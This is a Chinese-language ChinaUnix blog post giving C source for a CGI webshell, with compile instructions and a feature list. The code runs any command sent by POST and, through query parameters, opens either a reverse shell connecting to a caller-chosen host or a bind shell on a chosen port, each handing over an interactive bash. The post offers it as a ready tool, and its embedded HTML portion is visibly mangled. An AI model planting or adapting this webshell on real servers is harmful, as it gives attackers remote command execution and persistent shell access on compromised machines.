Linux C实现cgi shell-linuxnerd-ChinaUnix博客

CyberSecurity

首页　| 　博文目录　| 　关于我

linuxnerd

博客访问： 148939
博文数量： 13
博客积分： 0
博客等级：民兵
技术积分： 1192
用户组：普通用户
注册时间： 2013-10-11 15:41

个人简介

Cyber Security

文章分类

全部博文（13）

Linux（13）
未分配的博文（0）

文章存档

2015年（1）

2014年（6）

2013年（6）

我的朋友

相关博文

Linux C实现cgi shell

分类： C/C++

2015-02-03 11:51:52

C实现的cgi webshell

点击(此处)折叠或打开

#include <stdio.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
struct get_data {
char key[100];
char value[100];
};
void exec_cmd(void){
printf("Content-type:text/html\n\n");
FILE *command;
int size = atoi(getenv("CONTENT_LENGTH"));
if(size > 1500) {
printf("Error> Post Data is very big");
exit(0);
}
char *buffer = malloc(size+1);
fread(buffer,1,size,stdin);
command = popen(buffer,"r");
char caracter;
while((caracter = fgetc(command))){
if(caracter == EOF) break;
printf("%c",caracter);
}
pclose(command);
free(buffer);
exit(0);
}
int error(char *err){
perror(err);
exit(EXIT_FAILURE);
}
void parser_get(void){
printf("Content-type:text/html\n\n");
struct get_data *s;
char *GET = (char *)getenv("QUERY_STRING");
int i,number_of_get = 0,size_get = strlen(GET);
if(strlen(GET) > 100)
exit(0);
s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
int element = 0;
int positionA = 0;
int positionB = 0;
int id = 0;
for(i=0;i<size_get;i++){
if(GET[i] == '='){
id = 1;
s[element].key[positionA] = '\0';
positionB = 0;
continue;
}
if(GET[i] == '&'){
id = 0;
s[element].key[positionA] = '\0';
s[element].value[positionB] = '\0';
positionA = 0;
positionB = 0;
element++;
continue;
}
if(id==0){
s[element].key[positionA] = GET[i];
positionA++;
}
if(id==1){
s[element].value[positionB] = GET[i];
positionB++;
}
if(i == size_get-1 && GET[size_get-1] != '&'){
s[element].key[positionA] = '\0';
s[element].value[positionB] = '\0';
element++;
continue;
}
}
char *host_x = (char *)malloc(100);
host_x = NULL;
char *type_x = (char *)malloc(100);
type_x = NULL;
int port_x = 0;
for(i=0;i<element;i++){
if(strcmp(s[i].key,"type")==0)
type_x = s[i].value;
else if(strcmp(s[i].key,"host")==0)
host_x = s[i].value;
else if(strcmp(s[i].key,"port")==0)
port_x = atoi(s[i].value);
}
free(s);
if(type_x == NULL){
free(type_x);
free(host_x);
exit(0);
}
if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){
printf("Something is wrong ... !!!");
free(type_x);
free(host_x);
exit(0);
}
if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
printf("You must specify a target host ...");
free(type_x);
free(host_x);
exit(0);
}
if(strcmp(type_x,"reverse") == 0){
struct sockaddr_in addr;
int msocket;
msocket = socket(AF_INET,SOCK_STREAM,0);
if(msocket < 0){
printf("Fail to create socket");
free(host_x);
free(type_x);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port_x);
addr.sin_addr.s_addr = inet_addr(host_x);
memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
printf("Fail to connect\n");
free(host_x);
free(type_x);
exit(0);
}
printf("Connect with sucess !!!\n");
if(fork() == 0){
close(0); close(1); close(2);
dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
execl("/bin/bash","bash","-i", (char *)0);
close(msocket);
exit(0);
}
free(host_x);
free(type_x);
exit(0);
} else if (strcmp(type_x,"bind")==0) {
int my_socket, cli_socket;
struct sockaddr_in server_addr,cli_addr;
if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("Fail to create socket");
exit(1);
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port_x);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
int optval = 1;
setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
printf("Fail to bind");
free(host_x);
free(type_x);
exit(1);
}
if (listen(my_socket, 1) < 0){
printf("Fail to listen");
free(host_x);
free(type_x);
exit(1);
} else {
printf("Listen on port %d\n",port_x);
}
if(fork() == 0){
socklen_t tamanho = sizeof(struct sockaddr_in);
if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
exit(0);
}
close(0); close(1); close(2);
dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
execl("/bin/bash","bash","-i",(char *)0);
close(cli_socket);
}
}
free(host_x);
free(type_x);
exit(0);
}
void load_css_js(void){
printf("\n\
\n\
");
}
int main(void){
if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();
if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();
printf("Content-type:text/html\n\n");
printf("\n");
printf("\t\n\tContent-type\" content=\"text/html;charset=UTF-8\">\n");
printf("\t\t C CGI SHELL =D \n");
load_css_js();
printf("\n\t\n");
printf("\t\n");
printf(" \n\
page-wrap\">\n\
C - CGI SHELL
```
C0d3r: webshell | REVERSE/BIND
```
\n\
\n\
text\" style=\"width:300px;\" id=\"xxx\" onkeyup=\"if(event.keyCode == 13) document.getElementById('lol').click()\">\n\
" type=\"button\" value=\"Run Command\" onclick=\"exec_cmd()\">br/>\n\
" id='result'>

以上为部分代码（CU的富文本编辑器有些问题）

编译：
gcc shell.c -o shell.cgi

功能：
1.反弹获得shell（target作为客户端）

2.监听获得shell（target作为服务端）

3.命令行执行

阅读(3002) | 评论(0) | 转发(0) |

上一篇：PAM模块的backdoor实现与分析

下一篇：没有了

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6

C - CGI SHELL